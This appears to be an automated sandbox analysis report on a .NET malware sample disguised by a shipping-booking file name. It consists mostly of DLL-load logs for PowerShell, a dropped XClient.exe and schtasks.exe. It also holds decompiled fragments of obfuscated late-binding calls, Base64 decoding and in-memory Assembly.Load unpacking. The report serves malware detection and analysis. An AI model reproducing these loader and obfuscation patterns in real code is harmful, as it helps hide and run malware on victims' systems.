Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: XClient.lnk.10.dr

LNK file: ..\..\..\..\..\..\Local\XClient.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.sbktxjFwkFkhFsjrvspdYOD22he4M34sievnaWNyBCQnbd99km38od,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.VpqE6qu5NBFVe1zKtqqYKa4xj7pX4LpVFFJgvtRtolV8dajKFze95c,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.OT62GEi9AYDMy21VeJYWlGUcstKt4Y5QIAGq49kqQAYL0CT6se8Sar,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.T3Idj3F2oDeFMsad6egEQRL3y9cedieeV5mm9bZlTTGdzNhQhbYPV9,UZUv4Eo6zQhbxPiCqZPo3OnZwa02.XqczzdES8LwwFq4wGxNFUpvyopni()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[2],UZUv4Eo6zQhbxPiCqZPo3OnZwa02.mvlATZvtOhScDB0n3yloDYdLenXf(Convert.FromBase64String(rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.sbktxjFwkFkhFsjrvspdYOD22he4M34sievnaWNyBCQnbd99km38od,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.VpqE6qu5NBFVe1zKtqqYKa4xj7pX4LpVFFJgvtRtolV8dajKFze95c,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.OT62GEi9AYDMy21VeJYWlGUcstKt4Y5QIAGq49kqQAYL0CT6se8Sar,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.T3Idj3F2oDeFMsad6egEQRL3y9cedieeV5mm9bZlTTGdzNhQhbYPV9,UZUv4Eo6zQhbxPiCqZPo3OnZwa02.XqczzdES8LwwFq4wGxNFUpvyopni()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[2],UZUv4Eo6zQhbxPiCqZPo3OnZwa02.mvlATZvtOhScDB0n3yloDYdLenXf(Convert.FromBase64String(rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.sbktxjFwkFkhFsjrvspdYOD22he4M34sievnaWNyBCQnbd99km38od,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.VpqE6qu5NBFVe1zKtqqYKa4xj7pX4LpVFFJgvtRtolV8dajKFze95c,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.OT62GEi9AYDMy21VeJYWlGUcstKt4Y5QIAGq49kqQAYL0CT6se8Sar,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.T3Idj3F2oDeFMsad6egEQRL3y9cedieeV5mm9bZlTTGdzNhQhbYPV9,UZUv4Eo6zQhbxPiCqZPo3OnZwa02.XqczzdES8LwwFq4wGxNFUpvyopni()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[2],UZUv4Eo6zQhbxPiCqZPo3OnZwa02.mvlATZvtOhScDB0n3yloDYdLenXf(Convert.FromBase64String(rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.sbktxjFwkFkhFsjrvspdYOD22he4M34sievnaWNyBCQnbd99km38od,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.VpqE6qu5NBFVe1zKtqqYKa4xj7pX4LpVFFJgvtRtolV8dajKFze95c,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.OT62GEi9AYDMy21VeJYWlGUcstKt4Y5QIAGq49kqQAYL0CT6se8Sar,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.T3Idj3F2oDeFMsad6egEQRL3y9cedieeV5mm9bZlTTGdzNhQhbYPV9,UZUv4Eo6zQhbxPiCqZPo3OnZwa02.XqczzdES8LwwFq4wGxNFUpvyopni()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[2],UZUv4Eo6zQhbxPiCqZPo3OnZwa02.mvlATZvtOhScDB0n3yloDYdLenXf(Convert.FromBase64String(rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.5810000.6.raw.unpack, -Module-.cs	.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.5810000.6.raw.unpack, PingPong.cs	.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	.Net Code: OOhr3a1YQb System.Reflection.Assembly.Load(byte[])
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: jhixk0okiH6FnLIqMolEiqWfLniTXnNWbUgssa3zRYDFr2Rk0WDYWEaapMJOtmnWzdbj9a0VVhIXuwdqkskpcu System.AppDomain.Load(byte[])
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: _4qZ9RqLLGP44xXNmp2yU0BCZiruHdYKJFgKMs4eoIxwSJOsJK55OLEpezf8IuMLvAl3RXcpFAacfInWz53O227 System.AppDomain.Load(byte[])
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: _4qZ9RqLLGP44xXNmp2yU0BCZiruHdYKJFgKMs4eoIxwSJOsJK55OLEpezf8IuMLvAl3RXcpFAacfInWz53O227
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: jhixk0okiH6FnLIqMolEiqWfLniTXnNWbUgssa3zRYDFr2Rk0WDYWEaapMJOtmnWzdbj9a0VVhIXuwdqkskpcu System.AppDomain.Load(byte[])
